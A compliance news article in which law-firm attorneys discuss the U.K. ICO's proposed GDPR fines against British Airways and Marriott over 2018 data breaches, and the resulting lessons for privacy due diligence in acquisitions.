No Result
View All Result
SUBSCRIBE | NO FEES, NO PAYWALLS
MANAGE MY SUBSCRIPTION
NEWSLETTER
Corporate Compliance Insights
  • Home
  • About
    • About CCI
    • Writing for CCI
    • NEW: CCI Press – Book Publishing
    • Advertise With Us
  • Explore Topics
    • See All Articles
    • Compliance
    • Ethics
    • Risk
    • FCPA
    • Governance
    • Fraud
    • Internal Audit
    • HR Compliance
    • Cybersecurity
    • Data Privacy
    • Financial Services
    • Well-Being at Work
    • Leadership and Career
    • Opinion
  • Vendor News
  • Career Connection
  • Events
    • Calendar
    • Submit an Event
  • Library
    • Whitepapers & Reports
    • eBooks
    • CCI Press & Compliance Bookshelf
  • Podcasts
  • Videos
  • Subscribe
  • Home
  • About
    • About CCI
    • Writing for CCI
    • NEW: CCI Press – Book Publishing
    • Advertise With Us
  • Explore Topics
    • See All Articles
    • Compliance
    • Ethics
    • Risk
    • FCPA
    • Governance
    • Fraud
    • Internal Audit
    • HR Compliance
    • Cybersecurity
    • Data Privacy
    • Financial Services
    • Well-Being at Work
    • Leadership and Career
    • Opinion
  • Vendor News
  • Career Connection
  • Events
    • Calendar
    • Submit an Event
  • Library
    • Whitepapers & Reports
    • eBooks
    • CCI Press & Compliance Bookshelf
  • Podcasts
  • Videos
  • Subscribe
No Result
View All Result
Corporate Compliance Insights
Home Data Privacy

ICO to Issue More Than $350M in Fines for GDPR Data Breaches

Record Fines for British Airways and Marriott

by Daniel Alvarez and Henrietta de Salis
August 20, 2019
in Data Privacy, Featured
high-rise Marriott hotel

In light of news of substantial fines from the U.K.’s ICO, Willkie Farr & Gallagher attorneys discuss the importance of safeguarding and understanding the personal data in a company’s possession – whether its own or acquired through corporate transactions.

In two statements released this week, the U.K. Information Commissioner’s Office (ICO) announced its intention to fine both British Airways and Marriott International for infringements of the General Data Protection Regulation in connection with GDPR data breaches reported by those companies in 2018. The proposed fines would be the two largest penalties levied against a company under the GDPR by any regulator in the U.K. The ICO’s announcement follows the French data protection authority’s action earlier this year, in which it fined Google €50 million (approximately US$56 million) for violations of the GDPR related to transparency and consent.  The ICO’s announcements and accompanying fines highlight the importance of safeguarding and understanding the personal data in a company’s possession, whether its own or acquired through corporate transactions.

The ICO will take account of any representations by British Airways and Marriott and other EU member states’ data protection authorities before taking its final decision.

British Airways: A Record-Setting Fine

On July 8, 2019, the ICO announced that it intends to fine British Airways £183,390,000 (approximately US$230 million) for violations of the GDPR related to a cybersecurity incident in which malware on the airline’s website diverted user traffic to a fraudulent site where attackers were able to harvest customer details. The personal data (including credit card information) of approximately 500,000 customers was compromised in the incident. Following an extensive investigation, the ICO asserted that poor security measures at British Airways enabled the data breach and justified the proposed penalty. While the ICO noted that the airline has made improvements to its security program following the incident, the GDPR requires covered entities to implement appropriate security measures and to notify supervisory authorities and individuals of data breaches if certain thresholds are met. The proposed fine is by far the highest imposed under the GDPR to date, but it could have been higher. The proposed fine is equal to 1.5 percent of the airline’s global turnover for financial year 2017. The GDPR permits penalties up to 4 percent of annual revenues.

British Airways, in a statement to investors by its parent company, IAG, has stated that it found no evidence of fraudulent activity on accounts linked to the incident and that it intends to vigorously defend itself against the proposed fine.

Marriott: Spotlight on Data Security in Due Diligence

The day after its British Airways announcement, the ICO announced its intention to fine Marriott International £99,200,396 (approximately US$124 million) in connection with a breach of its Starwood guest reservation database that affected approximately 339 million guests. Marriott discovered and disclosed the incident in November 2018, though the compromise in Starwood’s systems likely took place in 2014 — before Starwood was acquired by Marriott in 2016.

In its announcement of the proposed penalty, the ICO highlighted the importance of privacy and data security due diligence in deals to ensure compliance with the GDPR and asserted that Marriott had failed to undertake “sufficient due diligence” and “should have done more to secure its systems” when it acquired Starwood in 2016. The U.K. Information Commissioner Elizabeth Denham noted: “The GDPR makes it clear that organizations must be accountable for the personal data they hold. This can include carrying out proper due diligence when making a corporate acquisition and putting in place proper accountability measures to assess not only what personal data has been acquired, but also how it is protected.”

Moving Forward

Unfortunately for most companies, these announcements have raised more questions than they have answered. We will ultimately have to wait and see if the ICO will issue detailed findings and guidance on some of the specific points raised, such as what qualifies as “sufficient due diligence” in corporate acquisitions. An implication of the ICO’s statement regarding its investigation of Marriott is that sufficient due diligence would have given Marriott the opportunity to, or require Starwood to, put in place adequate data security measures over customer data. The ICO has noted that Marriott has made improvements to its data security arrangements since the GDPR data breaches came to light. In the meantime, these announcements reinforce that regulators intend to use their significant authority to impose fines granted by the GDPR, and the Marriott announcement in particular highlights that buyers and sellers alike should thoughtfully consider privacy and data security issues when assessing risk as part of the M&A due diligence process. And while the ICO’s announcement specifically highlights this need for any deal that might involve EU personal data subject to the GDPR, it remains the case that even deals outside of the GDPR’s scope should include careful review of privacy and data security issues as well, as evidenced by the 2016 Yahoo/Verizon deal, in which Verizon was able to negotiate $350 million off of Yahoo’s purchase price due to previously undisclosed security breaches.


Tags: Data BreachDue DiligenceGDPRMergers and Acquisitions
Previous Post

Complying with California’s New Privacy Law

Next Post

Protecting Privacy Rights While Preventing Financial Exploitation

Daniel Alvarez and Henrietta de Salis

Daniel Alvarez and Henrietta de Salis

Daniel K. Alvarez is a partner in Willkie Farr & Gallagher’s Communications & Media Department in Washington. He is also a member of the Cybersecurity & Privacy Practice Group. Daniel brings an extensive background in technology and regulatory issues to counseling a broad range of clients in diverse industries on privacy and cybersecurity issues, including financial and health care privacy, regulation of marketing and advertising practices, international data transfer, children’s privacy and other privacy and cybersecurity matters regulated by the FTC, FCC, SEC and other state and federal agencies.
Henrietta de Salis is a U.K. partner in Willkie’s London office and a member of the Asset Management, Corporate & Financial Services, Structured Finance & Derivatives and Data Privacy & Security practice groups. Henrietta provides advice and transaction support to banks, securities firms, asset and investment managers, funds and intermediaries — including broker-dealers, custodians, trading platforms, private equity firms, wealth managers and insurers — on U.K. and European financial services legislation and compliance matters in both the wholesale and retail markets.
This article and others can be accessed through Willkie Compliance Concourse, a free, on-demand, web-based app providing access to practical guidance and the latest developments in regulatory compliance, investigations and enforcement, available at https://complianceconcourse.willkie.com.

Related Posts

credit score gauge

Sales at All Costs? Unified Credit Risk Management Can Squash Bad Deals Before They Happen

by Matthew Debbage
March 15, 2023

The collapse of a business doesn’t usually happen all at once. There are warning signs. Late payments, legal filings and...

gdpr

UK Resurrects Data Protection Reforms, EU Court Rules on GDPR in Civil Cases

by Jonathan Armstrong and André Bywater
March 15, 2023

Recent courtroom and legislative action in Europe will likely have ripple effects around the world for companies subject to regulations...

data breach

Sobering Reality: Drizly Order Indicates Officers May Face Personal Liability for Data Breaches

by Baker Donelson
February 1, 2023

The FTC says Drizly’s CEO James Cory Rellas was alerted to a potential security loophole two years before a data...

hottest takes

The Hottest Compliance Takes of 2022

by Staff and Wire Reports
December 14, 2022

Nobody was canceled for anything they wrote for our pages in 2022 — at least that we know of. But...

Next Post
credit card on fish hook

Protecting Privacy Rights While Preventing Financial Exploitation

Compliance Job Interview Q&A

Jump to a Topic

AML Anti-Bribery Anti-Corruption Artificial Intelligence (AI) Automation Banking Board of Directors Board Risk Oversight Business Continuity Planning California Consumer Privacy Act (CCPA) Code of Conduct Communications Management Corporate Culture COVID-19 Cryptocurrency Culture of Ethics Cybercrime Cyber Risk Data Analytics Data Breach Data Governance DOJ Download Due Diligence Enterprise Risk Management (ERM) ESG FCPA Enforcement Actions Financial Crime Financial Crimes Enforcement Network (FinCEN) GDPR HIPAA Know Your Customer (KYC) Machine Learning Monitoring RegTech Reputation Risk Risk Assessment SEC Social Media Risk Supply Chain Technology Third Party Risk Management Tone at the Top Training Whistleblowing
No Result
View All Result

Privacy Policy

Founded in 2010, CCI is the web’s premier global independent news source for compliance, ethics, risk and information security. 

Got a news tip? Get in touch. Want a weekly round-up in your inbox? Sign up for free. No subscription fees, no paywalls. 

Follow Us

Browse Topics:

  • CCI Press
  • Compliance
  • Compliance Podcasts
  • Cybersecurity
  • Data Privacy
  • eBooks Published by CCI
  • Ethics
  • FCPA
  • Featured
  • Financial Services
  • Fraud
  • Governance
  • GRC Vendor News
  • HR Compliance
  • Internal Audit
  • Leadership and Career
  • On Demand Webinars
  • Opinion
  • Resource Library
  • Risk
  • Uncategorized
  • Videos
  • Webinars
  • Well-Being
  • Whitepapers

© 2022 Corporate Compliance Insights

No Result
View All Result
  • Home
  • About
    • About CCI
    • Writing for CCI
    • NEW: CCI Press – Book Publishing
    • Advertise With Us
  • Explore Topics
    • See All Articles
    • Compliance
    • Ethics
    • Risk
    • FCPA
    • Governance
    • Fraud
    • Internal Audit
    • HR Compliance
    • Cybersecurity
    • Data Privacy
    • Financial Services
    • Well-Being at Work
    • Leadership and Career
    • Opinion
  • Vendor News
  • Career Connection
  • Events
    • Calendar
    • Submit an Event
  • Library
    • Whitepapers & Reports
    • eBooks
    • CCI Press & Compliance Bookshelf
  • Podcasts
  • Videos
  • Subscribe

© 2022 Corporate Compliance Insights

Welcome to CCI. This site uses cookies. Please click OK to accept. Privacy Policy
Cookie settingsACCEPT
Manage consent

Privacy Overview

This website uses cookies to improve your experience while you navigate through the website. Out of these, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may affect your browsing experience.
Necessary
Always Enabled
Necessary cookies are absolutely essential for the website to function properly. These cookies ensure basic functionalities and security features of the website, anonymously.
CookieDurationDescription
cookielawinfo-checbox-analytics11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checbox-functional11 monthsThe cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checbox-others11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-necessary11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-performance11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy11 monthsThe cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.
Functional
Functional cookies help to perform certain functionalities like sharing the content of the website on social media platforms, collect feedbacks, and other third-party features.
Performance
Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.
Analytics
Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics the number of visitors, bounce rate, traffic source, etc.
Advertisement
Advertisement cookies are used to provide visitors with relevant ads and marketing campaigns. These cookies track visitors across websites and collect information to provide customized ads.
Others
Other uncategorized cookies are those that are being analyzed and have not been classified into a category as yet.
SAVE & ACCEPT